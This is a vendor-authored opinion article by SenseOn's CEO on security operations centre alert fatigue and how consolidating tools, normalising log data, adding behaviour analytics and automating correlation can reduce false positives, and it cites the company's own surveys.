By David Atkinson, CEO, SenseOn
Why are 67% of SOC analysts contemplating a career change? The reason: alerts. Specifically, the overwhelming amount of time spent by SOC analysts to address security alerts and tickets that far surpasses their available resources. This phenomenon, commonly known as alert fatigue, is pervasive across managed and in-house SOCs alike, where an array of tools like SIEMs, NDRs, and EPPs gather logs from diverse environments and employ signatures and rules to identify potential threats.
Fortunately, addressing SOC alert fatigue is within reach. While some may enhance their remediation workflows, there are technological advancements that can benefit every SOC in how security alerts are generated, correlated and presented to analysts.
A problem that shouldn’t be ignored
In an average SOC, solutions focusing on a single point might generate thousands of alerts in a week – and maybe a handful will actually require immediate attention and action. For those responsible for checking each alert, this massive volume of false positive notifications isn’t easy or quick to go through.
Spending countless hours on checking false positive alerts cost businesses money. It also makes SOC teams drained and stressed, thus they start searching for different job opportunities. In fact, a survey by SenseOn uncovered that 95% of security teams already struggle with retention due to staff stress.
This is a serious problem considering the ongoing cybersecurity talent shortage. SOC analysts also carry concerns over the potential of overlooking critical security incidents amid the barrage of repetitive or redundant alerts. If a malicious alert is mistakenly dismissed as just another false alarm, businesses run the risk of experiencing a catastrophic and costly data breach.
The gravity of the situation is underlined by the realisation that each false positive alert diminishes the ability to respond promptly and effectively to genuine threats. Alert fatigue can quickly erode trust in security operations across the entire organisation, as frequent interruptions for false alarms breed apathy among employees, undermining the seriousness with which security events are perceived.
Time to turn down the noise
Addressing alert fatigue necessitates a nuanced approach that balances the need for vigilance with the imperative to minimise noise. It is a complex challenge to reduce the frequency of alert risks without overlooking genuine threats and risking hefty fines from regulatory bodies. However, adopting a multifaceted, strategic approach together with the implementation of advanced technological tools will help improve the accuracy of threat detection and reduce the burden on over-stretched SOC teams.
One important initiative to undertake is for SOC teams to normalise log data into a single format. Traditional SOCs draw data from a plethora of tools and platforms like EDRs, NDRs and IPS and IDS systems, resulting in disparate data points. By consolidating data into a unified format, SOCs can enhance data quality and enable holistic visibility into suspicious activities across the network.
The consolidation of point products into a single solution also plays a pivotal role in SOC resilience and efficacy. Beyond operational benefits, such as time and cost savings, a unified security infrastructure promotes organisational stability and confidence. It mitigates the risk of gaps in defence coverage and simplifies the response to potential threats, thereby bolstering overall cyber defence posture. By reducing the number of disparate tools, SOCs can minimise the need for extensive training and upkeep, allowing them to focus more on proactive threat hunting and less on managing tool sprawl.
Moreover, modelling typical user and device behaviour is imperative for alleviating alert fatigue and speeding up the time it takes to investigate threats. Instead of solely relying on rule-based alerts, the integration of User and Entity Behaviour Analytics (UEBA) enables SOCs to establish baseline behaviour patterns and flag deviations indicative of potential threats. Continuously adapting to organisational environment changes enhances threat detection accuracy while minimising false alarms.
Finally, organisations stand to gain from automating data correlation and MITRE ATT&CK mapping to augment SOC efficiency. Advanced correlation capabilities automatically scrutinise security observations and contextualise them with data from various sources to pinpoint genuine threats. This approach streamlines the investigation process, empowering SOC analysts to prioritise and respond to incidents more effectively.
Charting a less noisy path forward
New research conducted by SenseOn has revealed that 83% of SOC teams express a keen interest in adopting AI-powered tools to automate security operations. This investment in AI holds significant promise, particularly for individual SOC analysts grappling with the strain of ongoing staff shortages and the inundation of daily alerts. Moreover, 53% of cybersecurity professionals express a desire for tools capable of curbing the alert volume.
However, security teams don’t want best-of-breed tools if they don’t integrate with the rest of their environment. A bigger security tool ecosystem creates more risks, as SOCs simply don’t have capacity to effectively operate layers of defensive technology. That’s why the consolidation of point products and having a single view of data is important. Organisations can be safer when the threat detection and response systems covering different parts of their environment talk to one another, collect data in a unified format, and ultimately distinguish genuine threats from background noise to diminish the occurrence of false positives.
The outcome of bolstering threat detection and response capabilities through solution consolidation and AI integration translates into tangible cost savings for organisations. By streamlining operations and mitigating the incidence of false positives, businesses can optimise resource allocation and enhance the efficiency of their security operations. Any company that puts in place a unified security stack will benefit from savings in analyst costs and a reduction in SIEM expenses, reducing blind spots and alleviating much of the stress to confront the burgeoning cybersecurity challenges with more confidence.
